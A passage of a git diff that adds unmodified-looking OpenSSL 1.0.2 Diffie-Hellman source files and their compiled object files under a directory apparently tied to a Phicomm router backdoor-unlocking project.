+                                      CRYPTO_LOCK_DH, dh->p, ctx);
+        if (!mont)
+            goto err;
+    }
+
+    if (generate_new_key) {
+        if (dh->q) {
+            do {
+                if (!BN_rand_range(priv_key, dh->q))
+                    goto err;
+            }
+            while (BN_is_zero(priv_key) || BN_is_one(priv_key));
+        } else {
+            /* secret exponent length */
+            l = dh->length ? dh->length : BN_num_bits(dh->p) - 1;
+            if (!BN_rand(priv_key, l, 0, 0))
+                goto err;
+        }
+    }
+
+    {
+        BIGNUM local_prk;
+        BIGNUM *prk;
+
+        if ((dh->flags & DH_FLAG_NO_EXP_CONSTTIME) == 0) {
+            BN_init(&local_prk);
+            prk = &local_prk;
+            BN_with_flags(prk, priv_key, BN_FLG_CONSTTIME);
+        } else
+            prk = priv_key;
+
+        if (!dh->meth->bn_mod_exp(dh, pub_key, dh->g, prk, dh->p, ctx, mont))
+            goto err;
+    }
+
+    dh->pub_key = pub_key;
+    dh->priv_key = priv_key;
+    ok = 1;
+ err:
+    if (ok != 1)
+        DHerr(DH_F_GENERATE_KEY, ERR_R_BN_LIB);
+
+    if ((pub_key != NULL) && (dh->pub_key == NULL))
+        BN_free(pub_key);
+    if ((priv_key != NULL) && (dh->priv_key == NULL))
+        BN_free(priv_key);
+    BN_CTX_free(ctx);
+    return (ok);
+}
+
+static int compute_key(unsigned char *key, const BIGNUM *pub_key, DH *dh)
+{
+    BN_CTX *ctx = NULL;
+    BN_MONT_CTX *mont = NULL;
+    BIGNUM *tmp;
+    int ret = -1;
+    int check_result;
+
+    if (BN_num_bits(dh->p) > OPENSSL_DH_MAX_MODULUS_BITS) {
+        DHerr(DH_F_COMPUTE_KEY, DH_R_MODULUS_TOO_LARGE);
+        goto err;
+    }
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    tmp = BN_CTX_get(ctx);
+
+    if (dh->priv_key == NULL) {
+        DHerr(DH_F_COMPUTE_KEY, DH_R_NO_PRIVATE_VALUE);
+        goto err;
+    }
+
+    if (dh->flags & DH_FLAG_CACHE_MONT_P) {
+        mont = BN_MONT_CTX_set_locked(&dh->method_mont_p,
+                                      CRYPTO_LOCK_DH, dh->p, ctx);
+        if ((dh->flags & DH_FLAG_NO_EXP_CONSTTIME) == 0) {
+            /* XXX */
+            BN_set_flags(dh->priv_key, BN_FLG_CONSTTIME);
+        }
+        if (!mont)
+            goto err;
+    }
+
+    if (!DH_check_pub_key(dh, pub_key, &check_result) || check_result) {
+        DHerr(DH_F_COMPUTE_KEY, DH_R_INVALID_PUBKEY);
+        goto err;
+    }
+
+    if (!dh->
+        meth->bn_mod_exp(dh, tmp, pub_key, dh->priv_key, dh->p, ctx, mont)) {
+        DHerr(DH_F_COMPUTE_KEY, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    ret = BN_bn2bin(tmp, key);
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    return (ret);
+}
+
+static int dh_bn_mod_exp(const DH *dh, BIGNUM *r,
+                         const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    /*
+     * If a is only one word long and constant time is false, use the faster
+     * exponenentiation function.
+     */
+    if (a->top == 1 && ((dh->flags & DH_FLAG_NO_EXP_CONSTTIME) != 0)) {
+        BN_ULONG A = a->d[0];
+        return BN_mod_exp_mont_word(r, A, p, m, ctx, m_ctx);
+    } else
+        return BN_mod_exp_mont(r, a, p, m, ctx, m_ctx);
+}
+
+static int dh_init(DH *dh)
+{
+    dh->flags |= DH_FLAG_CACHE_MONT_P;
+    return (1);
+}
+
+static int dh_finish(DH *dh)
+{
+    if (dh->method_mont_p)
+        BN_MONT_CTX_free(dh->method_mont_p);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..e3425344b3ca2ddb0426e22f77c820767b2b9c51
GIT binary patch
literal 5464
zcmcIoYit}>6~4Rc*jwt1H^rr<kFWs)TWD6huB95JRvvrTzE;PN#@;41NhfRX_<`-+
zWp@@k4RH*U4Vq33{ee*72dXM0M5X>H65{d0H8@2szbI9CC_frOp|PCMR7G~0gf8dY
zx!1m#><S6Qk!J2a-#zEt^SF=MJ)P8g{5~HM<Rg!eT~45c9ND+q?_}Lh5+Y6H{iglb
ztihP?=cu%X9Cc22&~nAxJ9H7{*ud!8?znom&)!xaS5xXppM4`m?Kg+1btyufr-B*k
z)O|VvO4LrYw!~MNfrmq%C1mkHGQJvr?U$1<xH18+SN6b*ja%!LjR4Hfm_GYe;QPy$
zo6fuo0-F6UgGEcNQxVc<|EARFn#+L9=CQ40%xA`^lM2%1QyrSUv2wRCPVF@q^_POw
zNk%N%TnE-^`FyEv^JM%yT^?y|*6a@{pQXHNHdtS4Z6@Y^*E~9UtGAn-nv;qQY4){#
zdxJXVC6F4{>@6^(*{^F(GFTaE8GWL>D!dGUz~;|1`|p~)Ey95WHHtoK9RR3vw6!He
zAH0_((cHrZsC6##rDN(*^_cpks<RTQhu!?AhN*oWlV3IQkV{%#Z94NENG^3|BFQ*}
zez|m)Yn2bq!=U;KyolzEhx^NKm-eyoKKmR~J_<w0_|{f8r1$`Jh9Si#Z%#3kgGsib
zWVuorqV@)e`<u!?2CIGcJDOc_r*x9UNkPItpmtp=q{;frhmeM#lWfFnILQz+A;?3s
zb-{Pr@2vHD;F~umsCBZFnC;XlcJ5ZH>CCUeIv9bX{jIWIdKwB$sMX;sEm@~R#C(0D
zRH;-zr-hccN|4!;LFUAAz7l^e{(H$#Sp&h%`6239OJEXe3YCILLz>eaR3E4ITfCem
z6nQ+Xu3)mLJre=H!lV?`?04Mo%9qV1z#@PN^E>MnqQb(uyTd%l6yleY@weTDhAU(R
z_XgV*kZ&e{)%gDAk8lAb>?@u%K<%s4-lp~+sQp`OG3e9mU-jGTnxnM_OZ&DuV}A2?
z>eN#wwgF}dd%3&&n@hk~jt5=t8!i_@4!1Py=YPSfdgC$bxI;rB)jn5VU3?f*sM@bG
z&wddE8`f&W_qIQ<*I+zx|7Q98;@x!odf)h))cyzcx%<}sb9@zY@&1dW3HyQ@fP2O)
z<Mt<OgLxx6JgkKiG~92PQ#stv|0nA0?*3vpk{T;z%~JRa(FdckgYkz-jEyh0#iFtH
z`(4<bzYdxZJm_cdK#KSYSw##hh1Bde#P`%8;#&y$?rCfYJ_{=Yb?)V33U5(1#`|Gx
z2b9pGN|1~|mm&{j;i~FULf`f$m6mS>x|Hy8U6&GhW=}$iovlwO9acj^IqrW?nHo^?
zk110sFq+b#Dlt`wfOMDA(xrsDz$#&OpNAHy4jgywf`n`rG|$$nXt!569!U6<sl!UX
z*EPJTbilN?7{=JHqEVoS+=j*5h`s}fcu_9w!P)_9=h&A~7-C)agHO){R3&`2E}=v$
zjMYD=L=s9^72#m+X1QJ?>iq{o(K_;8rJ7iv>dlBX6;-`iD*%?f^br93k{uEA9UK>Y
zm@B5hA(W4Dp4A!pNshnFV`Fs!9M=xY|CGBV^87i#eWV`VE{S!6T!5`oJ|Hy#NnV0M
z{x+H2=?4f#cPj<R?YDw}1PHFSo2d<0tiPAg-)i_1HE^Q_UaWyH*1(+__;+jIFV(<T
zYT)ZN@HcAUZ`HuB)WElE;JCo6<#R8rr)v0}HSqgt;CP!?v(p9m9k3EF@%1Uz`yq~B
z^WbTY2l-ZFdmntq?~ZErPjmSKm*3g*nJIn7I1wEu(3#Foo7hf3r#OYZv8+Cq%jm{J
z9=TkxI7{?iZLmw#^ueB<;pB)uqIPLXopcT8{euG|diTf?eWG9(2xLoh`q;EtB*{aE
z^nA(GjY1(;z!8+n8uOxCG}8rBFp~!B?pP}traqe+pD{8dLG|$|V|)gTjiJ}5GL~%{
zo6ZVlBbyOj=7p|<ZBQ7Wn$aiH)3Z3pCuYF{TS#X!_?l!sBZopF1|B_RA#3XMxdI!M
zL3C=;$Qp&TX)vGA$=n=-TaDH8=}ZP9nKS0*a$hx2ncvk=JEZ&EhMkaj_T7MwD5NJP
z{G$?%`x6Pvif6iz$Nh<f_?_?w`~?Jo5dRoF0)G)fAjI#2N8slX1VX$89)Sm8Js~0f
zad-s&fP~Bbd_}_XSA>v1CE@o-cv-^n>=yDrkZ{bE!2c-Wa=ibP@coi}Gv41o=)a6V
zBH?nplM?<3&=K?gM8d-oeo4aRdR>?B1Co3X-{0uZCnbEe20kX?a(?C|T+YvP5-!)J
z4JQP`M)q@5!Xq#y;yuA}3<J*)f&W#q|0xN-DB-OV4qZlA9{Cm&Hy`3Shq%YZnI>>?
z?_-US1TOCPFhh57&Jv6TNyv+HHq20WPF^C0w0m$NuX%9c&ksGg@c)Jf7k-A&5g?os
zA94P-dT??6cX)7d{^vcoIOj>Ucw){>k3nk|+;&Rz3dU?YY8neBiDuGfnncHnMG`IK
zkU{ZyG!85ZF$8*1IEd4;Bnk)IoRI~+Y|b>I@Ew1U9kZOD%$B10LN0F<%oE&z0hdZ4
zJ%?W({~Lut9YfvyVsq_vx(!+6>yxugR`jvOGX_OE;gM;9Ux*iZ@%O?Y&Lh^NSZAN%
zIA7K~CRRN2iUD30!IB4{hc^FP{W$2NP5d5|Nz9LThD>69(I#OK``-C4aQ~^S4E?Z&
z?*zVD{*E`fg3oe!%pcaso4*ubIDZTtnIiau5a{!6v-1{yix%%e(cck*&M?=PG3<L~
zvw$_g!^?~!jE->qFy}=h{1^OL=%7un{sPxu@=WN}|2pVa%ik5Azd!MbFn@S13VpHu
zs?CimSNVpx!V8P%6#g~o)yH2b-r561F7lr!Pka3Lu*_yP{dImoi~6HYB(MIz0Y>WA
AU;qFB

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.c
new file mode 100644
index 0000000..bebc160
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.c
@@ -0,0 +1,263 @@
+/* crypto/dh/dh_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dh.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const char DH_version[] = "Diffie-Hellman" OPENSSL_VERSION_PTEXT;
+
+static const DH_METHOD *default_DH_method = NULL;
+
+void DH_set_default_method(const DH_METHOD *meth)
+{
+    default_DH_method = meth;
+}
+
+const DH_METHOD *DH_get_default_method(void)
+{
+    if (!default_DH_method) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return FIPS_dh_openssl();
+        else
+            return DH_OpenSSL();
+#else
+        default_DH_method = DH_OpenSSL();
+#endif
+    }
+    return default_DH_method;
+}
+
+int DH_set_method(DH *dh, const DH_METHOD *meth)
+{
+    /*
+     * NB: The caller is specifically setting a method, so it's not up to us
+     * to deal with which ENGINE it comes from.
+     */
+    const DH_METHOD *mtmp;
+    mtmp = dh->meth;
+    if (mtmp->finish)
+        mtmp->finish(dh);
+#ifndef OPENSSL_NO_ENGINE
+    if (dh->engine) {
+        ENGINE_finish(dh->engine);
+        dh->engine = NULL;
+    }
+#endif
+    dh->meth = meth;
+    if (meth->init)
+        meth->init(dh);
+    return 1;
+}
+
+DH *DH_new(void)
+{
+    return DH_new_method(NULL);
+}
+
+DH *DH_new_method(ENGINE *engine)
+{
+    DH *ret;
+
+    ret = (DH *)OPENSSL_malloc(sizeof(DH));
+    if (ret == NULL) {
+        DHerr(DH_F_DH_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    ret->meth = DH_get_default_method();
+#ifndef OPENSSL_NO_ENGINE
+    if (engine) {
+        if (!ENGINE_init(engine)) {
+            DHerr(DH_F_DH_NEW_METHOD, ERR_R_ENGINE_LIB);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+        ret->engine = engine;
+    } else
+        ret->engine = ENGINE_get_default_DH();
+    if (ret->engine) {
+        ret->meth = ENGINE_get_DH(ret->engine);
+        if (!ret->meth) {
+            DHerr(DH_F_DH_NEW_METHOD, ERR_R_ENGINE_LIB);
+            ENGINE_finish(ret->engine);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+    }
+#endif
+
+    ret->pad = 0;
+    ret->version = 0;
+    ret->p = NULL;
+    ret->g = NULL;
+    ret->length = 0;
+    ret->pub_key = NULL;
+    ret->priv_key = NULL;
+    ret->q = NULL;
+    ret->j = NULL;
+    ret->seed = NULL;
+    ret->seedlen = 0;
+    ret->counter = NULL;
+    ret->method_mont_p = NULL;
+    ret->references = 1;
+    ret->flags = ret->meth->flags & ~DH_FLAG_NON_FIPS_ALLOW;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_DH, ret, &ret->ex_data);
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+#ifndef OPENSSL_NO_ENGINE
+        if (ret->engine)
+            ENGINE_finish(ret->engine);
+#endif
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_DH, ret, &ret->ex_data);
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+void DH_free(DH *r)
+{
+    int i;
+    if (r == NULL)
+        return;
+    i = CRYPTO_add(&r->references, -1, CRYPTO_LOCK_DH);
+#ifdef REF_PRINT
+    REF_PRINT("DH", r);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "DH_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (r->meth->finish)
+        r->meth->finish(r);
+#ifndef OPENSSL_NO_ENGINE
+    if (r->engine)
+        ENGINE_finish(r->engine);
+#endif
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_DH, r, &r->ex_data);
+
+    if (r->p != NULL)
+        BN_clear_free(r->p);
+    if (r->g != NULL)
+        BN_clear_free(r->g);
+    if (r->q != NULL)
+        BN_clear_free(r->q);
+    if (r->j != NULL)
+        BN_clear_free(r->j);
+    if (r->seed)
+        OPENSSL_free(r->seed);
+    if (r->counter != NULL)
+        BN_clear_free(r->counter);
+    if (r->pub_key != NULL)
+        BN_clear_free(r->pub_key);
+    if (r->priv_key != NULL)
+        BN_clear_free(r->priv_key);
+    OPENSSL_free(r);
+}
+
+int DH_up_ref(DH *r)
+{
+    int i = CRYPTO_add(&r->references, 1, CRYPTO_LOCK_DH);
+#ifdef REF_PRINT
+    REF_PRINT("DH", r);
+#endif
+#ifdef REF_CHECK
+    if (i < 2) {
+        fprintf(stderr, "DH_up, bad reference count\n");
+        abort();
+    }
+#endif
+    return ((i > 1) ? 1 : 0);
+}
+
+int DH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                        CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_DH, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int DH_set_ex_data(DH *d, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&d->ex_data, idx, arg));
+}
+
+void *DH_get_ex_data(DH *d, int idx)
+{
+    return (CRYPTO_get_ex_data(&d->ex_data, idx));
+}
+
+int DH_size(const DH *dh)
+{
+    return (BN_num_bytes(dh->p));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..9d2399beabe5a917e384c6cfec76419883b049c0
GIT binary patch
literal 4744
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
aJ`%)9NB#~IzSYY24~hSc^5B=7v;Ti96DfcI

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.c
new file mode 100644
index 0000000..494a887
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.c
@@ -0,0 +1,548 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/evp.h>
+#include <openssl/dh.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#include <openssl/objects.h>
+#include "evp_locl.h"
+
+/* DH pkey context structure */
+
+typedef struct {
+    /* Parameter gen parameters */
+    int prime_len;
+    int generator;
+    int use_dsa;
+    int subprime_len;
+    /* message digest used for parameter generation */
+    const EVP_MD *md;
+    int rfc5114_param;
+    /* Keygen callback info */
+    int gentmp[2];
+    /* KDF (if any) to use for DH */
+    char kdf_type;
+    /* OID to use for KDF */
+    ASN1_OBJECT *kdf_oid;
+    /* Message digest to use for key derivation */
+    const EVP_MD *kdf_md;
+    /* User key material */
+    unsigned char *kdf_ukm;
+    size_t kdf_ukmlen;
+    /* KDF output length */
+    size_t kdf_outlen;
+} DH_PKEY_CTX;
+
+static int pkey_dh_init(EVP_PKEY_CTX *ctx)
+{
+    DH_PKEY_CTX *dctx;
+    dctx = OPENSSL_malloc(sizeof(DH_PKEY_CTX));
+    if (!dctx)
+        return 0;
+    dctx->prime_len = 1024;
+    dctx->subprime_len = -1;
+    dctx->generator = 2;
+    dctx->use_dsa = 0;
+    dctx->md = NULL;
+    dctx->rfc5114_param = 0;
+
+    dctx->kdf_type = EVP_PKEY_DH_KDF_NONE;
+    dctx->kdf_oid = NULL;
+    dctx->kdf_md = NULL;
+    dctx->kdf_ukm = NULL;
+    dctx->kdf_ukmlen = 0;
+    dctx->kdf_outlen = 0;
+
+    ctx->data = dctx;
+    ctx->keygen_info = dctx->gentmp;
+    ctx->keygen_info_count = 2;
+
+    return 1;
+}
+
+static int pkey_dh_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    DH_PKEY_CTX *dctx, *sctx;
+    if (!pkey_dh_init(dst))
+        return 0;
+    sctx = src->data;
+    dctx = dst->data;
+    dctx->prime_len = sctx->prime_len;
+    dctx->subprime_len = sctx->subprime_len;
+    dctx->generator = sctx->generator;
+    dctx->use_dsa = sctx->use_dsa;
+    dctx->md = sctx->md;
+    dctx->rfc5114_param = sctx->rfc5114_param;
+
+    dctx->kdf_type = sctx->kdf_type;
+    dctx->kdf_oid = OBJ_dup(sctx->kdf_oid);
+    if (!dctx->kdf_oid)
+        return 0;
+    dctx->kdf_md = sctx->kdf_md;
+    if (dctx->kdf_ukm) {
+        dctx->kdf_ukm = BUF_memdup(sctx->kdf_ukm, sctx->kdf_ukmlen);
+        dctx->kdf_ukmlen = sctx->kdf_ukmlen;
+    }
+    dctx->kdf_outlen = sctx->kdf_outlen;
+    return 1;
+}
+
+static void pkey_dh_cleanup(EVP_PKEY_CTX *ctx)
+{
+    DH_PKEY_CTX *dctx = ctx->data;
+    if (dctx) {
+        if (dctx->kdf_ukm)
+            OPENSSL_free(dctx->kdf_ukm);
+        if (dctx->kdf_oid)
+            ASN1_OBJECT_free(dctx->kdf_oid);
+        OPENSSL_free(dctx);
+    }
+}
+
+static int pkey_dh_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    DH_PKEY_CTX *dctx = ctx->data;
+    switch (type) {
+    case EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN:
+        if (p1 < 256)
